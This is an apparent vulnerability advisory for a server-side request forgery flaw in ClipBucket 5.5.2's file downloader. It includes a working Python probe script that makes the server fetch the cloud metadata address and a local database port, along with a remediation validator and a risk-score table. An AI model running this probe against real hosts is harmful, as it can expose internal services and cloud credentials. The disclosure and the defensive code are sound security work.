ClipBucket Server-Side Request Forgery Vulnerability in File Downloader Component

Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in ClipBucket version 5.5.2 Build #90. An authenticated low-privileged user can place an arbitrary URL in the 'file' parameter of 'upload/actions/file_downloader.php' and have the server fetch it on their behalf. Because the application neither validates nor restricts that URL, the attacker can make the server connect to internal resources or cloud metadata endpoints that are not reachable from outside.

Impact

Exploitation of this vulnerability could lead to unauthorized access to internal services, disclosure of sensitive metadata or API keys, and potential pivoting into internal networks or systems.

Reproduction

To reproduce this vulnerability, an authenticated user sends a POST request to 'upload/actions/file_downloader.php' with a valid session cookie and a 'file' parameter that points to an internal resource or a cloud metadata service. If the response contains the fetched content, the SSRF is confirmed directly. If the content is not reflected, compare timing: a request for an internal address that hangs until the server-side timeout, while a request for a closed or non-routable address fails immediately, shows that the server attempted the connection (blind SSRF).
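The request described above as a small probe script. This is an added example, not code from the advisory or from ClipBucket; it assumes the session cookie is named PHPSESSID (PHP's default, not confirmed by the advisory), that the endpoint reads 'file' from a form-encoded POST body, and that you are authorised to test the target host. The probe target list is illustrative.

```python
"""Probe for the ClipBucket file_downloader SSRF.

Added example (not ClipBucket code). Assumptions not confirmed by the advisory:
the session cookie is named PHPSESSID and the endpoint accepts 'file' as a
form-encoded POST parameter.
"""
import time
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT_PATH = "upload/actions/file_downloader.php"

# Illustrative targets: the link-local metadata address used by several clouds,
# and a loopback service that will hang or return a banner rather than HTTP.
PROBE_TARGETS = [
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1:3306/",
]


def build_probe(base_url, session_id, target, cookie_name="PHPSESSID"):
    """Build the POST to file_downloader.php with file=<target> and the session cookie."""
    endpoint = urllib.parse.urljoin(base_url.rstrip("/") + "/", ENDPOINT_PATH)
    body = urllib.parse.urlencode({"file": target}).encode()
    req = urllib.request.Request(endpoint, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", "%s=%s" % (cookie_name, session_id))
    return req


def run_probe(req, timeout=10.0):
    """Send one probe; return (outcome, http_status, elapsed_seconds, body_snippet)."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return "fetched", resp.status, time.monotonic() - start, resp.read(512)
    except urllib.error.HTTPError as e:          # subclass of URLError, so check first
        return "http_error", e.code, time.monotonic() - start, e.read(512)
    except OSError as e:                         # URLError, timeouts, connection resets
        return "timeout_or_error", None, time.monotonic() - start, repr(e).encode()


def interpret(outcome, elapsed, slow_threshold=5.0):
    """Classify a probe result the way the reproduction section does."""
    if outcome == "fetched":
        return "confirmed: server fetched the target and reflected it"
    if elapsed >= slow_threshold:
        return "likely blind SSRF: server waited on the target until timeout"
    return "inconclusive: fast failure, compare against a known-reachable host"


if __name__ == "__main__":
    import sys
    base, sid = sys.argv[1], sys.argv[2]          # e.g. https://host/clipbucket/ <PHPSESSID>
    for target in PROBE_TARGETS:
        outcome, status, elapsed, body = run_probe(build_probe(base, sid, target))
        print("%-45s %-16s status=%s %.2fs  %s" % (target, outcome, status, elapsed,
                                                  interpret(outcome, elapsed)))
```

Run it once against a target expected to hang (an internal address) and once against an address that should fail fast; the difference in elapsed time is the blind-SSRF signal when the body is not reflected.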

Remediation

To address this vulnerability, validate the 'file' parameter before any fetch is made: permit only the http and https schemes, restrict the host to an allowlist of known safe download sources, and reject any URL whose host resolves to a private, loopback, link-local or other non-public address, which covers the cloud metadata endpoints. Check every address the hostname resolves to rather than the hostname string alone, and either disable HTTP redirects or re-validate each redirect target, since an allowed host can redirect the server to an internal address. Additionally, apply network egress rules so the application host cannot initiate connections to internal service ranges or the metadata endpoint; this provides defence in depth if the application-layer check is bypassed.
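A validator implementing the remediation above, as an added example that is not ClipBucket's code. It restricts the scheme to http/https, checks the host against an allowlist (or, when no allowlist is given, falls back to address checks only), and rejects every resolved address that is not globally routable, including IPv4-mapped IPv6 forms of the metadata address. The ALLOWED_HOSTS entries are placeholders; the resolver is injectable so the DNS answer can be pinned and so the checks run offline.

```python
"""Allowlist and address validation for the 'file' parameter (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOSTS = frozenset({"cdn.example.test", "media.example.test"})  # placeholders
ALLOWED_SCHEMES = frozenset({"http", "https"})
# Names that reach the metadata service or the local machine without an IP literal.
BLOCKED_HOSTNAMES = frozenset({"localhost", "metadata", "metadata.google.internal"})


def resolve_all(host):
    """Return every address the system resolver gives for host (A and AAAA records)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    # sockaddr[0] is the textual address; drop any IPv6 scope suffix such as '%eth0'.
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def address_is_public(addr):
    """True only for globally routable unicast addresses (str or ipaddress object).

    is_global already excludes RFC 1918 space, loopback, link-local (169.254/16 and
    fe80::/10, so the metadata address), shared address space (100.64/10) and the
    reserved/documentation ranges. Multicast is excluded separately. IPv4-mapped and
    6to4 IPv6 addresses are unwrapped first so ::ffff:169.254.169.254 is caught too.
    """
    if isinstance(addr, str):
        addr = ipaddress.ip_address(addr)
    if isinstance(addr, ipaddress.IPv6Address):
        if addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        elif addr.sixtofour is not None:
            addr = addr.sixtofour
    return addr.is_global and not addr.is_multicast


def validate_download_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=resolve_all):
    """Return url if it is safe to fetch server-side, else raise ValueError with the reason.

    allowed_hosts=None switches to deny-list mode (address checks only). The caller
    should connect to the addresses that were checked, not re-resolve the name.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:            # urlsplit lower-cases the scheme
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL not allowed")  # e.g. http://allowed@10.0.0.5/
    host = parts.hostname                              # lower-cased, brackets stripped
    if not host:
        raise ValueError("missing host")
    if host in BLOCKED_HOSTNAMES:
        raise ValueError("host is blocked: %r" % host)
    if allowed_hosts is not None and host not in allowed_hosts:
        raise ValueError("host not on allowlist: %r" % host)
    try:
        addresses = [ipaddress.ip_address(host)]       # IP literal: no DNS needed
    except ValueError:
        addresses = resolver(host)
    if not addresses:
        raise ValueError("host did not resolve: %r" % host)
    for addr in addresses:
        if not address_is_public(addr):
            raise ValueError("%s resolves to non-public address %s" % (host, addr))
    return url


def is_safe_download_url(url, **kwargs):
    """Boolean wrapper for callers that only need an accept/reject decision."""
    try:
        validate_download_url(url, **kwargs)
        return True
    except ValueError:
        return False
```

The fetcher that consumes the returned URL must disable redirects, or call validate_download_url on every Location header before following it; otherwise the allowlist is only as strong as the redirect policy of the allowed hosts.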

Added: Sep 18, 2025, 4:14 PM
Updated: Sep 18, 2025, 9:29 PM

Vulnerability Rating

Custom Algorithm
metric          score
spread            3.4
impact           10.0
exploitability    6.8
remediation       0.0
relevance         0.6
threat            6.5
urgency           2.9
incentive         1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.